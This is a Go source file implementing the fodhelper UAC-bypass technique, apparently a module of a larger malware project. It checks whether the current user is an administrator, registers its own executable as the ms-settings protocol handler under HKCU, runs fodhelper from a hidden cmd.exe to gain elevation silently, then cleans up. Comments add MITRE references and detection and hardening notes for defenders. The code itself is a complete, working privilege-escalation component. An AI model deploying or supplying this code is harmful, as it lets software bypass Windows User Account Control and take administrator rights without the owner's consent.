bypass.go
package uacbypass
import (
"github.com/hackirby/skuld/utils/program"
"os"
"os/exec"
"syscall"
"unsafe"
"golang.org/x/sys/windows/registry"
)
// CanElevate reports whether the account named by the USERNAME environment
// variable has administrator privilege according to NetUserGetInfo.
//
// It queries netapi32!NetUserGetInfo at information level 1 on the local
// machine (server name 0) and reads the privilege field of the returned
// record. A value of 2 corresponds to USER_PRIV_ADMIN.
//
// Analyst note: a process that resolves NetUserGetInfo for its own user and
// then writes under HKCU\Software\Classes (see Elevate) is checking whether a
// UAC bypass is worth attempting.
func CanElevate() bool {
// Receives the address of the buffer that NetUserGetInfo allocates.
var infoPointer uintptr
// NOTE(review): all return values of Call are discarded, so a failed lookup
// is not detected here; infoPointer would then still be 0 when it is
// dereferenced below.
syscall.NewLazyDLL("netapi32.dll").NewProc("NetUserGetInfo").Call(
0,
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(os.Getenv("USERNAME")))),
1,
uintptr(unsafe.Pointer(&infoPointer)),
)
// Release the API-allocated buffer on return. The argument is evaluated at
// this statement, i.e. after the query above has filled infoPointer.
defer syscall.NewLazyDLL("netapi32.dll").NewProc("NetApiBufferFree").Call(infoPointer)
// Local mirror of the level-1 record layout (USER_INFO_1); only Priv is read.
type user struct {
Username *uint16
Password *uint16
PasswordAge uint32
Priv uint32
HomeDir *uint16
Comment *uint16
Flags uint32
ScriptPath *uint16
}
// Reinterpret the returned buffer as the struct above.
info := (*user)(unsafe.Pointer(infoPointer))
// 2 == USER_PRIV_ADMIN.
return info.Priv == 2
}
// Elevate registers the current executable as the per-user handler for the
// ms-settings protocol and then launches fodhelper through a hidden cmd.exe.
//
// This is the publicly documented fodhelper UAC-bypass pattern (MITRE ATT&CK
// T1548.002, Bypass User Account Control). It returns the first error
// encountered, or nil once both registry values have been removed again.
//
// Detection and hardening notes for defenders:
//   - Registry: creation of, or writes to,
//     HKCU\Software\Classes\ms-settings\shell\open\command, in particular a
//     "DelegateExecute" value together with a default value that points at an
//     executable in a user-writable location.
//   - Process: fodhelper started by cmd.exe with no visible window, and any
//     process that fodhelper spawns other than the Settings application.
//   - Residue: only the two values are deleted, and only on the success path.
//     The key itself is never removed, and every early return after the writes
//     leaves the values in place, so the key is a usable forensic artifact.
//   - Hardening: setting UAC to "Always notify" and not using local-administrator
//     accounts for daily work are the commonly recommended mitigations for
//     auto-elevation bypasses of this kind.
func Elevate() error {
// Create (or open) the per-user handler key. HKCU is writable without
// elevation.
k, _, err := registry.CreateKey(registry.CURRENT_USER,
"Software\\Classes\\ms-settings\\shell\\open\\command", registry.ALL_ACCESS)
if err != nil {
return err
}
// Closes the handle only; the key remains in the registry.
defer k.Close()
// Path of the running binary, used as the handler command.
value, err := os.Executable()
if err != nil {
return err
}
// Default value of the command key = path of this executable.
if err = k.SetStringValue("", value); err != nil {
return err
}
// An empty DelegateExecute value is written alongside the default value.
if err = k.SetStringValue("DelegateExecute", ""); err != nil {
return err
}
// Start fodhelper via cmd.exe with the console window hidden, and wait for
// cmd.exe to finish.
cmd := exec.Command("cmd.exe", "/C", "fodhelper")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
err = cmd.Run()
if err != nil {
return err
}
// Remove the two values written above (success path only).
err = k.DeleteValue("")
if err != nil {
return err
}
err = k.DeleteValue("DelegateExecute")
if err != nil {
return err
}
return nil
}
// Run attempts the elevation sequence once and terminates the current process
// if it succeeds.
//
// It returns without doing anything when the process is already elevated
// (program.IsElevated), when CanElevate reports a non-administrator account,
// or when Elevate fails. The error from Elevate is discarded, so failures
// leave no trace in this function's output.
func Run() {
// Already elevated: nothing to do.
if program.IsElevated() {
return
}
// The account is not an administrator according to NetUserGetInfo.
if !CanElevate() {
return
}
// Elevation attempt failed; the error is dropped silently.
if err := Elevate(); err != nil {
return
}
// Exit this instance with status 0 after a successful attempt.
// NOTE(review): presumably the copy started through the registered handler
// continues in its place; that hand-off is not visible in this file.
os.Exit(0)
}